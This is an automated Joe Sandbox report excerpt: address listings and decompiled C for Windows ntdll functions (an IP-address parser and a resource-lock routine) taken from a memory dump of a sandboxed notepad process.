                                                    0x00000000
                                                    0x00b63eba
                                                    0x00b63ecd
                                                    0x00b63ed2
                                                    0x00b63ee1
                                                    0x00b63ee7
                                                    0x00b63eec
                                                    0x00b63f12
                                                    0x00b63f18
                                                    0x00b63f1a
                                                    0x00000000
                                                    0x00000000
                                                    0x00b63f20
                                                    0x00b63f26
                                                    0x00b63f28
                                                    0x00000000
                                                    0x00000000
                                                    0x00b63f2e
                                                    0x00b63f30
                                                    0x00000000
                                                    0x00000000
                                                    0x00b63f3a
                                                    0x00b63f3b
                                                    0x00b63f53
                                                    0x00b63f64
                                                    0x00b63f69
                                                    0x00b63f6c
                                                    0x00b63f6d
                                                    0x00b63f6f
                                                    0x00b6e304
                                                    0x00b6e30f
                                                    0x00b6e315
                                                    0x00b6e31e
                                                    0x00b6e321
                                                    0x00b6e327
                                                    0x00b6e329
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b6e32f
                                                    0x00b6e32f
                                                    0x00b6e337
                                                    0x00b6e33a
                                                    0x00b6e33b
                                                    0x00b6e33d
                                                    0x00b6e33f
                                                    0x00b6e341
                                                    0x00b6e341
                                                    0x00b6e34e
                                                    0x00b6e353
                                                    0x00b6e358
                                                    0x00b6e35d
                                                    0x00b6e35f
                                                    0x00000000
                                                    0x00000000
                                                    0x00b6e365
                                                    0x00b6e365
                                                    0x00b6e368
                                                    0x00b6e36e
                                                    0x00000000
                                                    0x00000000
                                                    0x00b6e374
                                                    0x00b6e32f
                                                    0x00b63f75
                                                    0x00b63f7a
                                                    0x00b63f7c
                                                    0x00b63f7e
                                                    0x00b63f86
                                                    0x00b47f39
                                                    0x00b47f47
                                                    0x00b47f47
                                                    0x00b47f37
                                                    0x00b47f37
                                                    0x00000000

                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B63F12
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B63F4A
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B63EC4
                                                    • ExecuteOptions, xrefs: 00B63F04
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B63F75
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B6E345
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B6E2FB
                                                    • Execute=1, xrefs: 00B63F5E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: 5da1c281818ac6e92cd471f3906e37f023875b5217bd926b20def76e40f7dcc1
                                                    • Instruction ID: aa18365dd675f90894547f4f3974d601d30890a233f7117c266ecae993b5398d
                                                    • Opcode Fuzzy Hash: 5da1c281818ac6e92cd471f3906e37f023875b5217bd926b20def76e40f7dcc1
                                                    • Instruction Fuzzy Hash: 0741B572A8061C7BDB209B949CD6FEA73FCAF14700F4004E9F609A6191EB70DB85DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B50B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B50B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00B28980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L00B1DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00B50CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00B50CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00B506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00B506BA(_t135, _t178) == 0 || E00B50A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00B50CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00B50CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00B506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00B506BA(_t124, _t142) == 0 || E00B50A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                    0x00b50b21
                                                    0x00b50b24
                                                    0x00b50b27
                                                    0x00b50b2a
                                                    0x00b50b2d
                                                    0x00b50b30
                                                    0x00b50b33
                                                    0x00b50b36
                                                    0x00b50b39
                                                    0x00b50b3e
                                                    0x00b50c65
                                                    0x00b50c68
                                                    0x00b50c6a
                                                    0x00b50c6f
                                                    0x00b7eb42
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eb48
                                                    0x00b7eb48
                                                    0x00b50c75
                                                    0x00b50c7a
                                                    0x00b7eb54
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eb5a
                                                    0x00b50c80
                                                    0x00b50c84
                                                    0x00b7eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eba6
                                                    0x00b50cb8
                                                    0x00b50cba
                                                    0x00b50cd3
                                                    0x00b50cda
                                                    0x00b50ce4
                                                    0x00b50ce9
                                                    0x00000000
                                                    0x00b50cec
                                                    0x00b50c8c
                                                    0x00b7eb63
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eb70
                                                    0x00b7eb75
                                                    0x00b7eb7d
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eb8c
                                                    0x00000000
                                                    0x00b7eb8c
                                                    0x00b50c96
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50ca2
                                                    0x00b50cac
                                                    0x00b50cb4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50b44
                                                    0x00b50b47
                                                    0x00b50b49
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50b4f
                                                    0x00b50b50
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50b56
                                                    0x00b50b62
                                                    0x00b50b7c
                                                    0x00b50bac
                                                    0x00b50a0f
                                                    0x00b7eaaa
                                                    0x00000000
                                                    0x00b7eac4
                                                    0x00b7eac4
                                                    0x00b50bd0
                                                    0x00b50bd0
                                                    0x00b50bd4
                                                    0x00b50bd9
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50bdb
                                                    0x00b50be0
                                                    0x00b7eb0e
                                                    0x00b50a1a
                                                    0x00000000
                                                    0x00b50a1a
                                                    0x00b7eb1a
                                                    0x00b7eb1f
                                                    0x00b7eb27
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eb36
                                                    0x00000000
                                                    0x00b7eb36
                                                    0x00b50bea
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50bf6
                                                    0x00b50c00
                                                    0x00b50c03
                                                    0x00b50c0b
                                                    0x00000000
                                                    0x00b50c0b
                                                    0x00b7eaaa
                                                    0x00000000
                                                    0x00b50a15
                                                    0x00b50bb6
                                                    0x00000000
                                                    0x00b50bc6
                                                    0x00b50bc6
                                                    0x00b50bcb
                                                    0x00b50c15
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50c1d
                                                    0x00b50c20
                                                    0x00b50c21
                                                    0x00b50c24
                                                    0x00b50c24
                                                    0x00b50c26
                                                    0x00000000
                                                    0x00b50c26
                                                    0x00b50bcd
                                                    0x00000000
                                                    0x00b50bcd
                                                    0x00b50b89
                                                    0x00b50b89
                                                    0x00b50b90
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50b96
                                                    0x00000000
                                                    0x00b50b96
                                                    0x00b50a04
                                                    0x00b50a04
                                                    0x00b50b9a
                                                    0x00b50b9a
                                                    0x00b50b9b
                                                    0x00b50b9f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50ba5
                                                    0x00b50ac7
                                                    0x00b50aca
                                                    0x00b7eacf
                                                    0x00000000
                                                    0x00b7eade
                                                    0x00b7eade
                                                    0x00b7eae3
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eaf3
                                                    0x00b7eaf6
                                                    0x00b7eaf7
                                                    0x00b7eafe
                                                    0x00b7eb01
                                                    0x00000000
                                                    0x00b7eb01
                                                    0x00b7eacf
                                                    0x00b50ad0
                                                    0x00b50ad4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50ada
                                                    0x00b50ae6
                                                    0x00b50c34
                                                    0x00000000
                                                    0x00b50c47
                                                    0x00b50c49
                                                    0x00b50c4a
                                                    0x00b50c4e
                                                    0x00b50c51
                                                    0x00b50c54
                                                    0x00b50c57
                                                    0x00b50c5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50c60
                                                    0x00b50afb
                                                    0x00b50afe
                                                    0x00b50b02
                                                    0x00b50b05
                                                    0x00b50b08
                                                    0x00000000
                                                    0x00b50b08
                                                    0x00b50ae6
                                                    0x00b50b44
                                                    0x00b509f8
                                                    0x00b509f8
                                                    0x00b509f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eaa0
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: 6dd6311d5176e63da635aa74a2f28fb534ae00d51145349993261b93ffa87b30
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: D3A18F7192030ADBDF24EF58C8857AEBBF4EF06306F2485EADC52A7241D7309A49CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B50554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E00B50554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00bf01c0;
									_push(_t144);
									_push(0);
									_t51 = E00B0F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00B54FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00B63F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00B9217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00B63F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00B53915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00bf01c0;
												_push(_t138);
												_push(0);
												_t58 = E00B0F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00B54FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00B63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00B9217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00B63F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00B53915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00B35384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00B0F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00B53915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00B0F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00B53915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00B0F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00B53915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00B35329(_t110, _t138);
																_t69 = E00B353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                    0x00b5055a
                                                    0x00b5055d
                                                    0x00b50563
                                                    0x00b50566
                                                    0x00b505d8
                                                    0x00b505e2
                                                    0x00b505e5
                                                    0x00000000
                                                    0x00b505e7
                                                    0x00b505e7
                                                    0x00b505ea
                                                    0x00b505f3
                                                    0x00b505f3
                                                    0x00b50568
                                                    0x00b50568
                                                    0x00b50568
                                                    0x00b50569
                                                    0x00b50569
                                                    0x00b50569
                                                    0x00b5056b
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7217f
                                                    0x00b72183
                                                    0x00b7225b
                                                    0x00b7225f
                                                    0x00b72189
                                                    0x00b7218c
                                                    0x00b7218f
                                                    0x00b72194
                                                    0x00b72199
                                                    0x00b7219d
                                                    0x00b721a0
                                                    0x00b721a2
                                                    0x00b721ce
                                                    0x00b721ce
                                                    0x00b721ce
                                                    0x00b721d0
                                                    0x00b721d6
                                                    0x00b721de
                                                    0x00b721e2
                                                    0x00b721e8
                                                    0x00b721e9
                                                    0x00b721ec
                                                    0x00b721f1
                                                    0x00b721f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721f8
                                                    0x00b721fb
                                                    0x00b72206
                                                    0x00b7220b
                                                    0x00b7220c
                                                    0x00b72217
                                                    0x00b72226
                                                    0x00b7222b
                                                    0x00b7222c
                                                    0x00b7222f
                                                    0x00b72232
                                                    0x00b72235
                                                    0x00b72235
                                                    0x00b7223a
                                                    0x00b7223f
                                                    0x00b72241
                                                    0x00b72243
                                                    0x00b72248
                                                    0x00b72248
                                                    0x00b7224d
                                                    0x00b7224f
                                                    0x00b72262
                                                    0x00b72263
                                                    0x00b72268
                                                    0x00b72269
                                                    0x00b72269
                                                    0x00b72269
                                                    0x00b7226d
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72276
                                                    0x00b72279
                                                    0x00b7227e
                                                    0x00b72283
                                                    0x00b72287
                                                    0x00b7228a
                                                    0x00b7228d
                                                    0x00b7228f
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722be
                                                    0x00b722c4
                                                    0x00b722cc
                                                    0x00b722d0
                                                    0x00b722d6
                                                    0x00b722d7
                                                    0x00b722da
                                                    0x00b722df
                                                    0x00b722e4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722e6
                                                    0x00b722e9
                                                    0x00b722f4
                                                    0x00b722f9
                                                    0x00b722fa
                                                    0x00b72305
                                                    0x00b72314
                                                    0x00b72319
                                                    0x00b7231a
                                                    0x00b7231d
                                                    0x00b72320
                                                    0x00b72323
                                                    0x00b72323
                                                    0x00b72328
                                                    0x00b7232d
                                                    0x00b7232f
                                                    0x00b72331
                                                    0x00b72336
                                                    0x00b72336
                                                    0x00b7233b
                                                    0x00b7233d
                                                    0x00b72350
                                                    0x00b72351
                                                    0x00b72356
                                                    0x00b72359
                                                    0x00b72359
                                                    0x00b7235b
                                                    0x00b7235d
                                                    0x00b35367
                                                    0x00b3536b
                                                    0x00b35372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72363
                                                    0x00b72363
                                                    0x00b72369
                                                    0x00b7236a
                                                    0x00b7236c
                                                    0x00b72371
                                                    0x00b72373
                                                    0x00000000
                                                    0x00b72379
                                                    0x00b72379
                                                    0x00b7237a
                                                    0x00b7237f
                                                    0x00b7237f
                                                    0x00b72385
                                                    0x00b72386
                                                    0x00b72389
                                                    0x00b7238e
                                                    0x00b72390
                                                    0x00b35378
                                                    0x00b3537c
                                                    0x00b72396
                                                    0x00b72396
                                                    0x00b72397
                                                    0x00b7239c
                                                    0x00b723a2
                                                    0x00b723a3
                                                    0x00b723a6
                                                    0x00b723ab
                                                    0x00b723ad
                                                    0x00000000
                                                    0x00b723b3
                                                    0x00b723b3
                                                    0x00b723b4
                                                    0x00b723b9
                                                    0x00b723ba
                                                    0x00b723ba
                                                    0x00b723bc
                                                    0x00b723bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00b69153
                                                    0x00b69158
                                                    0x00b6915a
                                                    0x00b6915e
                                                    0x00b69160
                                                    0x00000000
                                                    0x00b69166
                                                    0x00b69166
                                                    0x00b69171
                                                    0x00b69176
                                                    0x00b69176
                                                    0x00000000
                                                    0x00b69160
                                                    0x00b723c6
                                                    0x00b723ce
                                                    0x00b723d7
                                                    0x00b723d7
                                                    0x00b723ad
                                                    0x00b72390
                                                    0x00b72373
                                                    0x00b7233f
                                                    0x00b7233f
                                                    0x00000000
                                                    0x00b7233f
                                                    0x00b72291
                                                    0x00b72291
                                                    0x00b72293
                                                    0x00b72295
                                                    0x00b7229a
                                                    0x00b722a1
                                                    0x00b722a3
                                                    0x00b722a7
                                                    0x00b722a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722ab
                                                    0x00b722ad
                                                    0x00b722af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722af
                                                    0x00b722b1
                                                    0x00b722b4
                                                    0x00b722b4
                                                    0x00b722b6
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00b353cb
                                                    0x00b353ce
                                                    0x00b353d0
                                                    0x00b353d4
                                                    0x00b353d6
                                                    0x00000000
                                                    0x00b353d8
                                                    0x00b353e3
                                                    0x00b353ea
                                                    0x00b353ea
                                                    0x00000000
                                                    0x00b353d6
                                                    0x00000000
